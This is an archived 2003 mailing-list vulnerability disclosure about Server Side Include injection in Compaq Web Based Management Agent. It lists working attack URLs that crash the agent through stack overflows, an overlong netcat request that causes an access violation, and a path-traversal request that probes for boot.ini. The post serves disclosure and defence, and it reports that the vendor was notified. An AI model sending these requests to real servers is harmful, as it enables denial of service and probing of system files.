Hosting Provided By

SSI vulnerability in Compaq Web Based Management Agent

From: Ian Vitek <ian.vitek(at)as5-5-7.bi.s.bonet.se>
Date: Wed Jun 18 2003 - 18:05:14 EDT

Type of vulnerabilities:
Server Side Include injection. Exploitable. Stack overflows and access violations. Exploitable? Creation of script objects. Exploitable?

Affected Software: Compaq Web Based Management Agent Verified Platforms: Windows

Background and problem description

Bashis (bash at wcd.se) has found several vulnerabilities in Compaq Web Based Management Agent. This Agent runs on TCP port 2301 (HTTP) or 2381 (HTTPS).
The agent uses "tags" to run funktions at the server side. To list all tags:
http://IP:2301/<!.TableDisplayTags>

To crash the agent:
http://IP:2301/<!>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc http://IP:2301/survey/<!>
Stack overflow (0xc00000fd), Address: 0x10039869

This crashes the agent too:
http://IP:2301/<!.StringRedirecturl>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc http://IP:2301/<!.StringHttpRequest=Url> Stack overflow (0xc00000fd), Address: 0x77f0c3dc http://IP:2301/survey/<!.StringHttpRequest=Url> Stack overflow (0xc00000fd), Address: 0x10039869

The cause could be an endless loop (the result contains a tag to display an URL, and the result contains a tag to display an URL, and the result...)

More strange stack overflows:
http://IP:2301/<!.ObjectIsapiECB>
Stack overflow (0xc00000fd), Address: 0x77f0c3dc

Do you need help?

Many tags take input that seems vulnerable: http://IP:2301/<!.StringIsapiECB=lpszPathInfo> Stack overflow (0xc00000fd), Address: 0x77f0c3dc

Netcat following:
GET /<!.FunctionContentType=(About 250 AAAAA:s)> HTTP/1.0 Access violation (0xc0000005), Address: 0x100368a5

Check file existens. (with a nice 'input box') http://IP:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini

It looks like you could create script objects. Check the tags with <!.TableDisplayTags>. Some of the CreateObject tags has the parameter 'script'. I don't know if it could be done though.

Is this just another remote DoS?
Are the Stack overflows and access violations exploitable? Can you create script objects and run them?

I have mailed HP (security-alert@hp.com) and got an automated response 28/5 2003.

If someone want to forward this mail they may do so. (bugtraq? vulnwatch?)

To all of my friends; See you in Vegas!
The Swedes are comming.
//Ian Vitek Received on Mon Jun 23 11:36:26 2003

Do you need more help?

This message: [ Message body ]
Next message: Nicolas RUFF (lists): "Re: Java class obfuscation"
Previous message: eip(at)oakey.no-ip.com: "Myserver 0.4.1 DOS..."

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:40 EDT